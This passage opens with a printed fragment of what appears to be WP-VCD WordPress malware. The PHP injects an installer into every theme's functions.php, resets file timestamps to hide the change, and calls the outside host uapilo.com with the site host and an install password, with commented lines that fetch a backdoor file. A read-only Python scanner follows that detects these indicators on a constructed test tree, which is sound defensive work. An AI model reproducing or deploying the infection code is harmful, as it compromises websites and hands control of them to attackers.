'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping = false; } } } } } } if ($ping) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); } if ($ping2) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } ?><?php error_reporting(0);?>
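A read-only scanner for the indicators visible in the plaintext parts of the samples above, as an added example that is not part of the original post: it flags the dropped file names, the reference to wp-vcd.php that gets prepended to post.php, and the WP_V_CD marker the installer looks for in each theme's functions.php. The function names and the constructed test tree are assumptions, and a hit means the file needs manual review, since security plugins may carry the same strings as signatures.

```python
import os
import re
import tempfile
from dataclasses import dataclass

# File names the samples write. wp-feed.php is matched only under wp-includes,
# which is where the wp-tmp.php sample stores its list of admin IP addresses.
DROPPED_ANYWHERE = {"wp-vcd.php", "wp-tmp.php"}
DROPPED_IN_WP_INCLUDES = {"wp-feed.php"}

# Strings visible in the plaintext parts of the samples (not decoded from the blobs).
CONTENT_MARKERS = {
    "WP_V_CD installer marker": re.compile(rb"WP_V_CD"),
    "reference to wp-vcd.php": re.compile(rb"wp-vcd\.php"),
    "$wp_auth_key assignment": re.compile(rb"\$wp_auth_key\s*="),
    "wordpress_cf_adm_use_adm cookie": re.compile(rb"wordpress_cf_adm_use_adm"),
    "//install_code block": re.compile(rb"//install_code"),
    "uapilo callback host": re.compile(rb"uapilo\."),
}


@dataclass(frozen=True)
class Finding:
    path: str       # relative to the scanned root, with forward slashes
    indicator: str  # which rule fired


def scan_wordpress_tree(root, max_bytes=5_000_000):
    """Walk root without modifying anything and return sorted Findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        in_wp_includes = os.path.basename(dirpath) == "wp-includes"
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            lname = name.lower()
            if lname in DROPPED_ANYWHERE or (
                in_wp_includes and lname in DROPPED_IN_WP_INCLUDES
            ):
                findings.append(Finding(rel, "dropped file name"))
            if not lname.endswith(".php"):
                continue
            try:
                # The samples prepend their code, so reading the first
                # max_bytes of each file is enough for these markers.
                with open(full, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                # Report instead of skipping silently: an unreadable PHP file
                # in a web root deserves a manual look.
                findings.append(Finding(rel, "unreadable PHP file"))
                continue
            for label, pattern in CONTENT_MARKERS.items():
                if pattern.search(data):
                    findings.append(Finding(rel, label))
    return sorted(findings, key=lambda f: (f.path, f.indicator))


def build_constructed_tree(root):
    """Create a small constructed tree with inert stand-ins for the infection."""
    files = {
        "wp-includes/post.php": "<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) "
        "include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php // core code\n",
        "wp-includes/wp-vcd.php": "<?php // inert placeholder for the dropped file\n",
        "wp-includes/wp-feed.php": "203.0.113.7 ",
        "wp-content/themes/infected/functions.php": "<?php // WP_V_CD (inert stand-in)\n"
        "add_action('init', 'theme_setup');\n",
        "wp-content/themes/clean/functions.php": "<?php add_action('init', 'theme_setup');\n",
        "wp-feed.php": "<?php // same name outside wp-includes: not flagged\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_tree(root)
        return scan_wordpress_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding.indicator:32} {finding.path}")
```

The installer calls touch() on each functions.php after writing to it, resetting the modification time, so content matching is more reliable here than searching for recently modified files.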